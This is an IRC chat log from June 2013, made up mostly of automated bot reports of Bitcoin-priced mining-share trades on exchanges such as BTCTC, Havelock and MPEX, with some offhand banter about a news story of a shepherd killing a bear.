[TAT.VIRTUALMINE] 48 @ 0.004918 = 0.2361 BTC [-] Jun 26 20:06:54 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00492 BTC [+] Jun 26 20:06:57 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.005389 BTC [+] Jun 26 20:07:43 [BTCTC] [TAT.ASICMINER] 3 @ 0.034125 = 0.1024 BTC [+] Jun 26 20:07:53 [HAVELOCK] [KCIM] 1 @ 1.029 BTC [-] Jun 26 20:08:26 [BTCTC] [TAT.ASICMINER] 91 @ 0.034125 = 3.1054 BTC [+] Jun 26 20:12:24 [BTCTC] [TAT.ASICMINER] 1 @ 0.03461 BTC [+] Jun 26 20:13:07 [BTCTC] [TAT.ASICMINER] 1 @ 0.034609 BTC [-] Jun 26 20:14:35 [BTCTC] [TAT.ASICMINER] 2 @ 0.034126 = 0.0683 BTC [-] Jun 26 20:14:38 [BTCTC] [TAT.ASICMINER] 20 @ 0.034125 = 0.6825 BTC [-] Jun 26 20:15:25 [HAVELOCK] [ASICM] 40 @ 0.03445 = 1.378 BTC [+] Jun 26 20:17:14 [BTCTC] [TAT.ASICMINER] 2 @ 0.029 = 0.058 BTC [-] Jun 26 20:17:52 [BTCTC] [TAT.ASICMINER] 5 @ 0.034126 = 0.1706 BTC [+] Jun 26 20:18:22 [BTCTC] [TAT.ASICMINER] 30 @ 0.034125 = 1.0238 BTC [-] Jun 26 20:18:44 [BTCTC] [TAT.ASICMINER] 1 @ 0.034126 BTC [+] Jun 26 20:19:21 [BTCTC] [TAT.ASICMINER] 1 @ 0.034126 BTC [+] Jun 26 20:19:29 ;;ticker Jun 26 20:19:30 MtGox BTCUSD ticker | Best bid: 104.00000, Best ask: 104.30000, Bid-ask spread: 0.30000, Last trade: 104.30001, 24 hour volume: 17784.17610744, 24 hour low: 101.50000, 24 hour high: 105.48990, 24 hour vwap: 103.61120 Jun 26 20:19:53 [BTCTC] [TAT.ASICMINER] 1 @ 0.034125 BTC [-] Jun 26 20:20:02 [BTCTC] [TAT.ASICMINER] 9 @ 0.033453 = 0.3011 BTC [-] Jun 26 20:20:04 [BTCTC] [TAT.ASICMINER] 15 @ 0.0334 = 0.501 BTC [-] Jun 26 20:20:06 [BTCTC] [TAT.ASICMINER] 5 @ 0.033351 = 0.1668 BTC [-] Jun 26 20:20:08 [BTCTC] [TAT.ASICMINER] 1 @ 0.033344 BTC [-] Jun 26 20:20:09 [BTCTC] [TAT.ASICMINER] 2 @ 0.0333 = 0.0666 BTC [-] Jun 26 20:20:10 [BTCTC] [TAT.ASICMINER] 40 @ 0.03321 = 1.3284 BTC [-] Jun 26 20:20:11 [BTCTC] [TAT.ASICMINER] 33 @ 0.0332 = 1.0956 BTC [-] Jun 26 20:20:16 [BTCTC] [TAT.ASICMINER] 27 @ 0.0332 = 0.8964 BTC [-] Jun 26 20:20:18 [BTCTC] [TAT.ASICMINER] 1 @ 0.033 BTC [-] Jun 26 20:20:19 [BTCTC] [TAT.ASICMINER] 10 @ 0.033 = 0.33 BTC [-] Jun 26 20:20:21 [BTCTC] [TAT.ASICMINER] 1 @ 0.033 BTC [-] Jun 26 20:20:25 [BTCTC] [TAT.ASICMINER] 30 @ 0.033 = 0.99 BTC [-] Jun 26 20:22:41 [BTCTC] [ASICMINER-PT] 1 @ 3.459 BTC [+] Jun 26 20:26:21 http://metro.co.uk/2013/05/27/shepherd-kills-brown-bear-with-his-bare-hands-after-squeezing-its-throat-3810110/ Jun 26 20:26:24 Shepherd 'kills bear with his bare hands after squeezing its throat' | Metro News Jun 26 20:26:31 [BTCTC] [S.DICE-PT] 40 @ 0.002442 = 0.0977 BTC [+] Jun 26 20:26:43 [BTCTC] [DMS.MINING] 8 @ 0.02106 = 0.1685 BTC [+] Jun 26 20:26:45 [BTCTC] [DMS.MINING] 27 @ 0.021 = 0.567 BTC [-] Jun 26 20:27:04 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.005829 BTC [+] Jun 26 20:27:18 [BTCTC] [DMS.SELLING] 35 @ 0.0331 = 1.1585 BTC [-] Jun 26 20:28:40 [HAVELOCK] [VTX] 6 @ 0.489999 = 2.94 BTC [+] Jun 26 20:28:54 [BTCTC] [S.MPOE-PT] 1 @ 0.00081 BTC [+] Jun 26 20:29:20 [BTCTC] [DMS.MINING] 20 @ 0.021 = 0.42 BTC [-] Jun 26 20:30:17 [BTCTC] [DMS.PURCHASE] 70 @ 0.053794 = 3.7656 BTC [-] Jun 26 20:30:40 [BTCTC] [TAT.ASICMINER] 2 @ 0.033 = 0.066 BTC [-] Jun 26 20:30:42 [BTCTC] [TAT.ASICMINER] 5 @ 0.0328 = 0.164 BTC [-] Jun 26 20:31:09 [HAVELOCK] [VTX] 4 @ 0.489999 = 1.96 BTC [+] Jun 26 20:31:20 wow, that guy must have balls of steel Jun 26 20:32:19 and bear hands Jun 26 20:32:22 badoom Jun 26 20:33:50 [BTCTC] [DMS.MINING] 32 @ 0.021 = 0.672 BTC [-] Jun 26 20:33:50 kakobrekla: LOL Jun 26 20:34:12 [HAVELOCK] [ASICM] [PAID] 45.95598376 BTC to 249`598 shares, 18412 satoshi per share Jun 26 20:34:15 [BTCTC] [TAT.ASICMINER] 20 @ 0.03291 = 0.6582 BTC [+] Jun 26 20:34:17 [BTCTC] [TAT.ASICMINER] 25 @ 0.0329 = 0.8225 BTC [-] Jun 26 20:34:29 [BTCTC] [DMS.SELLING] 1 @ 0.033111 BTC [+] Jun 26 20:34:29 [BTCTC] [DMS.SELLING] 10 @ 0.03311 = 0.3311 BTC [-] Jun 26 20:34:31 [BTCTC] [DMS.SELLING] 21 @ 0.0331 = 0.6951 BTC [-] Jun 26 20:34:50 [BTCTC] [TAT.ASICMINER] 5 @ 0.0329 = 0.1645 BTC [-] Jun 26 20:35:10 [BTCTC] [TAT.ASICMINER] 1 @ 0.03286 BTC [-] Jun 26 20:35:21 [BTCTC] [DMS.PURCHASE] 30 @ 0.053794 = 1.6138 BTC [-] Jun 26 20:35:24 [BTCTC] [ASICMINER-PT] 4 @ 3.4733 = 13.8932 BTC [+] Jun 26 20:36:26 yeah, chinese go fuck you dolphin, serbians go fuck you bear Jun 26 20:36:47 [HAVELOCK] [HIM] 40 @ 0.27 = 10.8 BTC [+] Jun 26 20:37:23 [BTCTC] [TAT.ASICMINER] 4 @ 0.03286 = 0.1314 BTC [-] Jun 26 20:37:42 er umm i mean japanese. Jun 26 20:38:49 [BTCTC] [BASIC-MINING] 1 @ 1.780001 BTC [-] Jun 26 20:38:50 [HAVELOCK] [ASICM] 87 @ 0.0345 = 3.0015 BTC [+] Jun 26 20:39:08 [BTCTC] [TAT.ASICMINER] 100 @ 0.033994 = 3.3994 BTC [+] Jun 26 20:39:10 [BTCTC] [TAT.ASICMINER] 500 @ 0.033996 = 16.998 BTC [+] Jun 26 20:39:11 [BTCTC] [TAT.ASICMINER] 106 @ 0.034 = 3.604 BTC [+] Jun 26 20:40:18 [HAVELOCK] [ASICM] 1 @ 0.0345 BTC [+] Jun 26 20:40:23 [BTCTC] [S.MPOE-PT] 1 @ 0.000909 BTC [+] Jun 26 20:44:28 no, it's like Jun 26 20:44:33 faka u dofin Jun 26 20:44:51 [HAVELOCK] [ASICM] 1 @ 0.0342 BTC [-] Jun 26 20:45:14 [HAVELOCK] [ASICM] 150 @ 0.03381 = 5.0715 BTC [-] Jun 26 20:45:16 [HAVELOCK] [ASICM] 11 @ 0.033803 = 0.3718 BTC [-] Jun 26 20:45:17 [HAVELOCK] [ASICM] 51 @ 0.033802 = 1.7239 BTC [-] Jun 26 20:45:18 [HAVELOCK] [ASICM] 87 @ 0.033801 = 2.9407 BTC [-] Jun 26 20:45:20 [HAVELOCK] [ASICM] 5 @ 0.0338 = 0.169 BTC [-] Jun 26 20:45:21 [HAVELOCK] [ASICM] 46 @ 0.03375101 = 1.5525 BTC [-] Jun 26 20:45:22 [HAVELOCK] [ASICM] 146 @ 0.03363002 = 4.91 BTC [-] Jun 26 20:45:23 [HAVELOCK] [ASICM] 4 @ 0.0336 = 0.1344 BTC [-] Jun 26 20:45:40 [BTCTC] [ASICMINER-PT] 2 @ 3.467 = 6.934 BTC [-] Jun 26 20:45:41 [HAVELOCK] [ASICM] 1214 @ 0.0342 = 41.5188 BTC [+] Jun 26 20:45:42 [HAVELOCK] [ASICM] 412 @ 0.0345 = 14.214 BTC [+] Jun 26 20:45:43 [HAVELOCK] [ASICM] 574 @ 0.03465 = 19.8891 BTC [+] Jun 26 20:47:51 [BTCTC] [ASICMINER-PT] 5 @ 3.467 = 17.335 BTC [-] Jun 26 20:48:11 [BTCTC] [ASICMINER-PT] 1 @ 3.467 BTC [-] Jun 26 20:49:19 [HAVELOCK] [ASICM] 3 @ 0.034649 = 0.1039 BTC [-] Jun 26 20:49:22 [BTCTC] [TAT.ASICMINER] 1 @ 0.034097 BTC [+] Jun 26 20:50:28 [BTCTC] [DMS.MINING] 30 @ 0.020312 = 0.6094 BTC [-] Jun 26 20:50:30 [BTCTC] [DMS.MINING] 10 @ 0.020311 = 0.2031 BTC [-] Jun 26 20:50:31 [BTCTC] [DMS.MINING] 40 @ 0.02031 = 0.8124 BTC [-] Jun 26 20:50:32 [BTCTC] [DMS.MINING] 25 @ 0.0203 = 0.5075 BTC [-] Jun 26 20:50:34 [BTCTC] [DMS.MINING] 3 @ 0.0203 = 0.0609 BTC [-] Jun 26 20:51:51 [BTCTC] [TAT.ASICMINER] 40 @ 0.034098 = 1.3639 BTC [+] Jun 26 20:52:18 [BTCTC] [TAT.ASICMINER] 10 @ 0.034098 = 0.341 BTC [+] Jun 26 20:52:26 [HAVELOCK] [ASICM] 6 @ 0.034649 = 0.2079 BTC [-] Jun 26 20:52:45 [BTCTC] [TAT.ASICMINER] 4 @ 0.0341 = 0.1364 BTC [+] Jun 26 20:52:49 [BTCTC] [TAT.ASICMINER] 38 @ 0.029 = 1.102 BTC [-] Jun 26 20:53:08 [BTCTC] [S.MPOE-PT] 29 @ 0.000909 = 0.0264 BTC [+] Jun 26 20:54:05 [BTCTC] [TAT.ASICMINER] 17 @ 0.034098 = 0.5797 BTC [+] Jun 26 20:54:26 [BTCTC] [TAT.ASICMINER] 1 @ 0.034098 BTC [+] Jun 26 20:54:42 [BTCTC] [DMS.MINING] 1 @ 0.02 BTC [-] Jun 26 20:54:44 [BTCTC] [DMS.MINING] 1 @ 0.02 BTC [-] Jun 26 20:54:45 [BTCTC] [DMS.MINING] 15 @ 0.02 = 0.3 BTC [-] Jun 26 20:54:52 [BTCTC] [S.MPOE-PT] 1 @ 0.000801 BTC [-] Jun 26 20:57:30 [HAVELOCK] [ASICM] 2 @ 0.034649 = 0.0693 BTC [-] Jun 26 20:57:33 [BTCTC] [TAT.VIRTUALMINE] 40 @ 0.00495 = 0.198 BTC [-] Jun 26 20:57:45 [HAVELOCK] [ASICM] 1 @ 0.034649 BTC [-] Jun 26 20:57:51 [HAVELOCK] [ASICM] 5 @ 0.034649 = 0.1732 BTC [-] Jun 26 20:57:56 [HAVELOCK] [ASICM] 7 @ 0.0345 = 0.2415 BTC [-] Jun 26 20:58:15 [HAVELOCK] [ASICM] 1 @ 0.0345 BTC [-] Jun 26 20:58:23 [BTCTC] [TAT.ASICMINER] 20 @ 0.034098 = 0.682 BTC [+] Jun 26 20:58:44 [HAVELOCK] [ASICM] 2 @ 0.0345 = 0.069 BTC [-] Jun 26 20:58:56 [BTCTC] [TAT.ASICMINER] 10 @ 0.03 = 0.3 BTC [-] Jun 26 20:58:58 [BTCTC] [TAT.VIRTUALMINE] 80 @ 0.00495 = 0.396 BTC [-] Jun 26 20:58:59 [HAVELOCK] [ASICM] 2 @ 0.0345 = 0.069 BTC [-] Jun 26 20:59:01 [BTCTC] [TAT.ASICMINER] 2 @ 0.034098 = 0.0682 BTC [+] Jun 26 20:59:38 [HAVELOCK] [HIM] 3 @ 0.27 = 0.81 BTC [+] Jun 26 21:00:23 [HAVELOCK] [HIM] 4 @ 0.27 = 1.08 BTC [+] Jun 26 21:01:56 [BTCTC] [TAT.ASICMINER] 10 @ 0.034098 = 0.341 BTC [+] Jun 26 21:01:58 [BTCTC] [TAT.ASICMINER] 16 @ 0.0341 = 0.5456 BTC [+] Jun 26 21:02:03 [HAVELOCK] [ASICM] 144 @ 0.0345 = 4.968 BTC [-] Jun 26 21:02:26 [BTCTC] [TAT.ASICMINER] 45 @ 0.034123 = 1.5355 BTC [+] Jun 26 21:02:28 [BTCTC] [TAT.ASICMINER] 33 @ 0.034126 = 1.1262 BTC [+] Jun 26 21:03:05 [HAVELOCK] [ASICM] 3 @ 0.0345 = 0.1035 BTC [-] Jun 26 21:03:06 [BTCTC] [ASICMINER-PT] 1 @ 3.3 BTC [-] Jun 26 21:03:08 [HAVELOCK] [ASICM] 5 @ 0.0345 = 0.1725 BTC [-] Jun 26 21:03:09 [BTCTC] [TAT.ASICMINER] 4 @ 0.034101 = 0.1364 BTC [-] Jun 26 21:04:28 [BTCTC] [TAT.ASICMINER] 1 @ 0.034499 BTC [+] Jun 26 21:04:39 [BTCTC] [TAT.ASICMINER] 3 @ 0.034499 = 0.1035 BTC [+] Jun 26 21:04:41 [BTCTC] [TAT.ASICMINER] 3 @ 0.0345 = 0.1035 BTC [+] Jun 26 21:05:12 [BTCTC] [TAT.ASICMINER] 2 @ 0.0345 = 0.069 BTC [+] Jun 26 21:06:42 [BTCTC] [TAT.ASICMINER] 1 @ 0.0345 BTC [+] Jun 26 21:07:32 [BTCTC] [S.MPOE-PT] 1 @ 0.001119 BTC [+] Jun 26 21:07:34 [BTCTC] [S.MPOE-PT] 3 @ 0.00114 = 0.0034 BTC [+] Jun 26 21:07:35 [HAVELOCK] [ASICM] 1 @ 0.03454 BTC [+] Jun 26 21:07:42 [BTCTC] [S.MPOE-PT] 1 @ 0.00114 BTC [+] Jun 26 21:07:43 [BTCTC] [TAT.ASICMINER] 11 @ 0.0346 = 0.3806 BTC [+] Jun 26 21:08:16 [BTCTC] [TAT.ASICMINER] 30 @ 0.0346 = 1.038 BTC [+] Jun 26 21:08:30 [BTCTC] [S.MPOE-PT] 1 @ 0.00081 BTC [-] Jun 26 21:10:06 [BTCTC] [S.MPOE-PT] 2 @ 0.00085 = 0.0017 BTC [+] Jun 26 21:10:08 [HAVELOCK] [ASICM] 1 @ 0.0345 BTC [-] Jun 26 21:10:31 [BTCTC] [S.MPOE-PT] 2 @ 0.00095 = 0.0019 BTC [+] Jun 26 21:13:01 [HAVELOCK] [HIM] 3 @ 0.26510201 = 0.7953 BTC [-] Jun 26 21:14:11 [BTCTC] [DMS.MINING] 30 @ 0.020276 = 0.6083 BTC [+] Jun 26 21:14:29 [BTCTC] [TAT.ASICMINER] 2 @ 0.0345 = 0.069 BTC [-] Jun 26 21:14:36 [HAVELOCK] [ASICM] 5 @ 0.03429 = 0.1715 BTC [-] Jun 26 21:15:01 [BTCTC] [DMS.MINING] 3 @ 0.021 = 0.063 BTC [+] Jun 26 21:15:24 ;;estimate Jun 26 21:15:25 Next difficulty estimate | 21088975.9583 based on data since last change | 22907291.4615 based on data for last three days Jun 26 21:15:59 [BTCTC] [TAT.VIRTUALMINE] 20 @ 0.004996 = 0.0999 BTC [+] Jun 26 21:17:11 [HAVELOCK] [ASICM] 25 @ 0.034 = 0.85 BTC [-] Jun 26 21:18:43 [BTCTC] [S.MPOE-PT] 1 @ 0.000821 BTC [-] Jun 26 21:19:04 [BTCTC] [TAT.VIRTUALMINE] 280 @ 0.004993 = 1.398 BTC [-] Jun 26 21:19:14 [BTCTC] [TAT.ASICMINER] 1 @ 0.0345 BTC [-] Jun 26 21:19:58 [BTCTC] [TAT.ASICMINER] 1 @ 0.0345 BTC [-] Jun 26 21:24:34 [MPEX] [S.MPOE] 7635 @ 0.00081437 = 6.2177 BTC [+] Jun 26 21:24:46 [MPEX] [S.MPOE] 10365 @ 0.0008143 = 8.4402 BTC [-] Jun 26 21:25:15 [BTCTC] [TAT.ASICMINER] 5 @ 0.0345 = 0.1725 BTC [-] Jun 26 21:25:17 [BTCTC] [TAT.ASICMINER] 13 @ 0.0345 = 0.4485 BTC [-] Jun 26 21:26:02 [HAVELOCK] [ASICM] 1 @ 0.03372 BTC [-] Jun 26 21:26:27 [BTCTC] [TAT.VIRTUALMINE] 199 @ 0.004951 = 0.9852 BTC [-] Jun 26 21:26:45 [HAVELOCK] [ASICM] 1 @ 0.03371 BTC [-] Jun 26 21:26:46 [HAVELOCK] [ASICM] 330 @ 0.03371 = 11.1243 BTC [-] Jun 26 21:26:48 [HAVELOCK] [ASICM] 79 @ 0.03371 = 2.6631 BTC [-] Jun 26 21:27:18 [HAVELOCK] [ASICM] 1 @ 0.03370576 BTC [-] Jun 26 21:27:19 [HAVELOCK] [ASICM] 15 @ 0.0337001 = 0.5055 BTC [-] Jun 26 21:27:20 [HAVELOCK] [ASICM] 98 @ 0.03370001 = 3.3026 BTC [-] Jun 26 21:27:44 [MPEX] [S.MPOE] 3435 @ 0.0008143 = 2.7971 BTC [-] Jun 26 21:27:46 [MPEX] [S.MPOE] 11550 @ 0.00080981 = 9.3533 BTC [-] Jun 26 21:27:48 [BTCTC] [TAT.ASICMINER] 19 @ 0.0346 = 0.6574 BTC [+] Jun 26 21:27:51 [BTCTC] [S.MPOE-PT] 1 @ 0.00083 BTC [+] Jun 26 21:28:00 [MPEX] [S.MPOE] 4420 @ 0.00080973 = 3.579 BTC [-] Jun 26 21:28:09 [HAVELOCK] [ASICM] 45 @ 0.03370001 = 1.5165 BTC [-] Jun 26 21:28:10 [HAVELOCK] [ASICM] 120 @ 0.0337 = 4.044 BTC [-] Jun 26 21:28:13 [HAVELOCK] [ASICM] 1 @ 0.0337 BTC [-] Jun 26 21:29:01 [BTCTC] [BASIC-MINING] 1 @ 1.878985 BTC [+] Jun 26 21:29:03 [BTCTC] [S.MPOE-PT] 2 @ 0.00085 = 0.0017 BTC [+] Jun 26 21:29:04 [BTCTC] [S.MPOE-PT] 5 @ 0.00095 = 0.0048 BTC [+] Jun 26 21:29:05 [BTCTC] [S.MPOE-PT] 1 @ 0.001119 BTC [+] Jun 26 21:29:11 [BTCTC] [TAT.ASICMINER] 1 @ 0.03462 BTC [+] Jun 26 21:29:42 [HAVELOCK] [ASICM] 63 @ 0.03361 = 2.1174 BTC [-] Jun 26 21:33:55 [BTCTC] [TAT.ASICMINER] 40 @ 0.03462 = 1.3848 BTC [+] Jun 26 21:37:07 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.00495 = 0.0099 BTC [-] Jun 26 21:38:20 [BTCTC] [S.MPOE-PT] 1 @ 0.000822 BTC [-] Jun 26 21:39:03 [BTCTC] [DMS.MINING] 30 @ 0.020001 = 0.6 BTC [-] Jun 26 21:39:05 [BTCTC] [DMS.MINING] 12 @ 0.02 = 0.24 BTC [-] Jun 26 21:39:25 [BTCTC] [TAT.ASICMINER] 1 @ 0.03461 BTC [-] Jun 26 21:39:56 [BTCTC] [DMS.MINING] 20 @ 0.01953 = 0.3906 BTC [-] Jun 26 21:39:58 [BTCTC] [DMS.MINING] 50 @ 0.01952 = 0.976 BTC [-] Jun 26 21:39:59 [BTCTC] [DMS.MINING] 10 @ 0.01951 = 0.1951 BTC [-] Jun 26 21:40:01 [BTCTC] [DMS.MINING] 14 @ 0.0195 = 0.273 BTC [-] Jun 26 21:41:52 [BTCTC] [BTC-BOND] 99 @ 0.009997 = 0.9897 BTC [-] Jun 26 21:42:06 [BTCTC] [BTC-BOND] 262 @ 0.009998 = 2.6195 BTC [+] Jun 26 21:42:08 [BTCTC] [BTC-BOND] 12 @ 0.009998 = 0.12 BTC [+] Jun 26 21:42:19 [BTCTC] [BTC-BOND] 1 @ 0.009999 BTC [+] Jun 26 21:42:29 [BTCTC] [BTC-BOND] 12 @ 0.009999 = 0.12 BTC [+] Jun 26 21:42:31 [BTCTC] [S.MPOE-PT] 1 @ 0.00084 BTC [+] Jun 26 21:43:24 [HAVELOCK] [ASICM] 10 @ 0.03361001 = 0.3361 BTC [+] Jun 26 21:43:25 [HAVELOCK] [ASICM] 437 @ 0.03361 = 14.6876 BTC [-] Jun 26 21:43:50 [BTCTC] [S.MPOE-PT] 1 @ 0.001089 BTC [+] Jun 26 21:43:51 [BTCTC] [S.MPOE-PT] 1 @ 0.00109 BTC [+] Jun 26 21:43:52 [BTCTC] [S.MPOE-PT] 5 @ 0.00111 = 0.0056 BTC [+] Jun 26 21:44:33 [BTCTC] [TAT.ASICMINER] 1 @ 0.03461 BTC [-] Jun 26 21:44:39 [HAVELOCK] [ASICM] 4 @ 0.03361 = 0.1344 BTC [-] Jun 26 21:45:48 [BTCTC] [COGNITIVE] 1 @ 0.369926 BTC [+] Jun 26 21:46:04 [BTCTC] [S.MPOE-PT] 1 @ 0.000825 BTC [-] Jun 26 21:46:35 [BTCTC] [BTC-BOND] 450 @ 0.01 = 4.5 BTC [+] Jun 26 21:47:01 [BTCTC] [S.MPOE-PT] 2 @ 0.00085 = 0.0017 BTC [+] Jun 26 21:47:05 [BTCTC] [S.MPOE-PT] 5 @ 0.00095 = 0.0048 BTC [+] Jun 26 21:47:22 [HAVELOCK] [ASICM] 3 @ 0.03361 = 0.1008 BTC [-] Jun 26 21:47:36 [HAVELOCK] [ASICM] 2 @ 0.03361 = 0.0672 BTC [-] Jun 26 21:48:05 [HAVELOCK] [ASICM] 10 @ 0.03361 = 0.3361 BTC [-] Jun 26 21:48:13 [BTCTC] [ASICMINER-PT] 1 @ 3.463 BTC [+] Jun 26 21:48:20 [HAVELOCK] [ASICM] 8 @ 0.03361 = 0.2689 BTC [-] Jun 26 21:48:27 [HAVELOCK] [ASICM] 1 @ 0.03361 BTC [-] Jun 26 21:48:29 [HAVELOCK] [ASICM] 29 @ 0.03361 = 0.9747 BTC [-] Jun 26 21:51:30 [BTCTC] [TAT.ASICMINER] 10 @ 0.03461 = 0.3461 BTC [-] Jun 26 21:51:32 [BTCTC] [TAT.VIRTUALMINE] 3 @ 0.005086 = 0.0153 BTC [+] Jun 26 21:52:35 [BTCTC] [TAT.ASICMINER] 2 @ 0.03461 = 0.0692 BTC [-] Jun 26 21:53:17 [BTCTC] [COGNITIVE] 4 @ 0.369917 = 1.4797 BTC [-] Jun 26 21:53:18 [BTCTC] [COGNITIVE] 1 @ 0.369918 BTC [+] Jun 26 21:54:31 [BTCTC] [S.MPOE-PT] 2 @ 0.00113 = 0.0023 BTC [+] Jun 26 21:55:12 [HAVELOCK] [ASICM] 36 @ 0.03361 = 1.21 BTC [-] Jun 26 21:55:45 [HAVELOCK] [ASICM] 5 @ 0.034 = 0.17 BTC [+] Jun 26 21:55:48 [HAVELOCK] [ASICM] 28 @ 0.0336 = 0.9408 BTC [-] Jun 26 21:55:58 [HAVELOCK] [ASICM] 9 @ 0.0335 = 0.3015 BTC [-] Jun 26 21:56:03 [HAVELOCK] [ASICM] 75 @ 0.0333 = 2.4975 BTC [-] Jun 26 21:56:40 [HAVELOCK] [ASICM] 4 @ 0.0333 = 0.1332 BTC [-] Jun 26 21:56:44 [HAVELOCK] [ASICM] 53 @ 0.033201 = 1.7597 BTC [-] Jun 26 21:56:56 [HAVELOCK] [ASICM] 1 @ 0.0332 BTC [-] Jun 26 21:57:01 [HAVELOCK] [ASICM] 13 @ 0.03305153 = 0.4297 BTC [-] Jun 26 21:57:27 [HAVELOCK] [ASICM] 100 @ 0.03331 = 3.331 BTC [+] Jun 26 21:57:28 [HAVELOCK] [ASICM] 15 @ 0.03300002 = 0.495 BTC [-] Jun 26 21:58:21 [HAVELOCK] [VTX] 20 @ 0.4899 = 9.798 BTC [-] Jun 26 21:59:36 [BTCTC] [ASICMINER-PT] 4 @ 3.46498 = 13.8599 BTC [+] Jun 26 21:59:40 [BTCTC] [ASICMINER-PT] 1 @ 3.463 BTC [-] Jun 26 22:00:49 [BTCTC] [ASICMINER-PT] 1 @ 3.463 BTC [-] Jun 26 22:04:34 [BTCTC] [ASICMINER-PT] 2 @ 3.463 = 6.926 BTC [-] Jun 26 22:07:22 [BTCTC] [ASICMINER-PT] 2 @ 3.381021 = 6.762 BTC [-] Jun 26 22:08:00 [BTCTC] [TAT.ASICMINER] 61 @ 0.034203 = 2.0864 BTC [-] Jun 26 22:08:10 [HAVELOCK] [ASICM] 1 @ 0.0339 BTC [+] Jun 26 22:09:51 [HAVELOCK] [ASICM] 1 @ 0.0339 BTC [+] Jun 26 22:10:15 [BTCTC] [TAT.ASICMINER] 30 @ 0.034203 = 1.0261 BTC [-] Jun 26 22:10:20 [BTCTC] [TAT.ASICMINER] 2 @ 0.034203 = 0.0684 BTC [-] Jun 26 22:11:06 [BTCTC] [TAT.ASICMINER] 7 @ 0.034203 = 0.2394 BTC [-] Jun 26 22:11:15 [BTCTC] [TAT.ASICMINER] 1 @ 0.034203 BTC [-] Jun 26 22:11:37 [BTCTC] [TAT.ASICMINER] 15 @ 0.034202 = 0.513 BTC [-] Jun 26 22:12:10 [BTCTC] [TAT.ASICMINER] 1 @ 0.034201 BTC [-] Jun 26 22:12:40 [BTCTC] [TAT.ASICMINER] 31 @ 0.034201 = 1.0602 BTC [-] Jun 26 22:13:02 [BTCTC] [TAT.ASICMINER] 18 @ 0.034201 = 0.6156 BTC [-] Jun 26 22:13:20 [HAVELOCK] [ASICM] 6 @ 0.0339 = 0.2034 BTC [+] Jun 26 22:13:46 [HAVELOCK] [ASICM] 1 @ 0.0331 BTC [-] Jun 26 22:13:46 [HAVELOCK] [ASICM] 1 @ 0.0331 BTC [-] Jun 26 22:14:20 [HAVELOCK] [ASICM] 1 @ 0.0331 BTC [-] Jun 26 22:17:04 [MPEX] [S.MPOE] 8293 @ 0.00080973 = 6.7151 BTC [-] Jun 26 22:17:52 [HAVELOCK] [ASICM] 11 @ 0.03309 = 0.364 BTC [-] Jun 26 22:19:49 [BTCTC] [ASICMINER-PT] 2 @ 3.464988 = 6.93 BTC [+] Jun 26 22:21:16 [HAVELOCK] [ASICM] 50 @ 0.03309 = 1.6545 BTC [-] Jun 26 22:21:20 [BTCTC] [TAT.ASICMINER] 1 @ 0.0342 BTC [-] Jun 26 22:21:22 [BTCTC] [TAT.ASICMINER] 2 @ 0.03411 = 0.0682 BTC [-] Jun 26 22:21:24 [HAVELOCK] [ASICM] 15 @ 0.03301 = 0.4952 BTC [-] Jun 26 22:21:25 [BTCTC] [TAT.ASICMINER] 4 @ 0.0341 = 0.1364 BTC [-] Jun 26 22:21:30 [HAVELOCK] [ASICM] 232 @ 0.03300005 = 7.656 BTC [-] Jun 26 22:21:36 [HAVELOCK] [ASICM] 100 @ 0.03300004 = 3.3 BTC [-] Jun 26 22:21:37 [BTCTC] [TAT.ASICMINER] 2 @ 0.034201 = 0.0684 BTC [+] Jun 26 22:21:48 [HAVELOCK] [ASICM] 235 @ 0.03300002 = 7.755 BTC [-] Jun 26 22:22:36 [HAVELOCK] [VTX] 19 @ 0.4899 = 9.3081 BTC [-] Jun 26 22:23:02 [HAVELOCK] [ASICM] 69 @ 0.033 = 2.277 BTC [-] Jun 26 22:23:25 [BTCTC] [DMS.MINING] 1 @ 0.0205 BTC [+] Jun 26 22:23:48 [HAVELOCK] [ASICM] 26 @ 0.033 = 0.858 BTC [-] Jun 26 22:24:01 [HAVELOCK] [VTX] 10 @ 0.489998 = 4.9 BTC [+] Jun 26 22:24:06 [BTCTC] [TAT.ASICMINER] 28 @ 0.034598 = 0.9687 BTC [+] Jun 26 22:24:22 [BTCTC] [ASICMINER-PT] 5 @ 3.38103 = 16.9052 BTC [-] Jun 26 22:24:32 [HAVELOCK] [ASICM] 52 @ 0.033099 = 1.7211 BTC [+] Jun 26 22:24:44 [HAVELOCK] [VTX] 1 @ 0.489998 BTC [+] Jun 26 22:24:56 [HAVELOCK] [HIM] 3 @ 0.279998 = 0.84 BTC [+] Jun 26 22:25:12 [BTCTC] [S.MPOE-PT] 1 @ 0.000821 BTC [-] Jun 26 22:25:14 [BTCTC] [TAT.VIRTUALMINE] 6 @ 0.005093 = 0.0306 BTC [+] Jun 26 22:25:22 [BTCTC] [COGNITIVE] 5 @ 0.330294 = 1.6515 BTC [-] Jun 26 22:25:23 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.005092 BTC [-] Jun 26 22:25:25 [BTCTC] [COGNITIVE] 1 @ 0.330293 BTC [-] Jun 26 22:25:26 [BTCTC] [COGNITIVE] 3 @ 0.330286 = 0.9909 BTC [-] Jun 26 22:25:47 [HAVELOCK] [ASICM] 479 @ 0.0331 = 15.8549 BTC [+] Jun 26 22:26:10 [HAVELOCK] [HIM] 20 @ 0.279999 = 5.6 BTC [+] Jun 26 22:26:14 [BTCTC] [TAT.VIRTUALMINE] 12 @ 0.004932 = 0.0592 BTC [-] Jun 26 22:26:16 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.004932 BTC [-] Jun 26 22:26:22 [BTCTC] [DMS.MINING] 13 @ 0.019801 = 0.2574 BTC [-] Jun 26 22:26:50 [BTCTC] [DMS.PURCHASE] 16 @ 0.053794 = 0.8607 BTC [-] Jun 26 22:26:52 [HAVELOCK] [HIM] 1 @ 0.29 BTC [+] Jun 26 22:26:55 [BTCTC] [TAT.VIRTUALMINE] 19 @ 0.004932 = 0.0937 BTC [-] Jun 26 22:27:30 [BTCTC] [TAT.VIRTUALMINE] 23 @ 0.004931 = 0.1134 BTC [-] Jun 26 22:27:31 [HAVELOCK] [HIM] 6 @ 0.3 = 1.8 BTC [+] Jun 26 22:27:38 [BTCTC] [TAT.ASICMINER] 30 @ 0.034578 = 1.0373 BTC [-] Jun 26 22:27:53 [BTCTC] [TAT.VIRTUALMINE] 56 @ 0.004919 = 0.2755 BTC [-] Jun 26 22:29:20 <[\\\]> 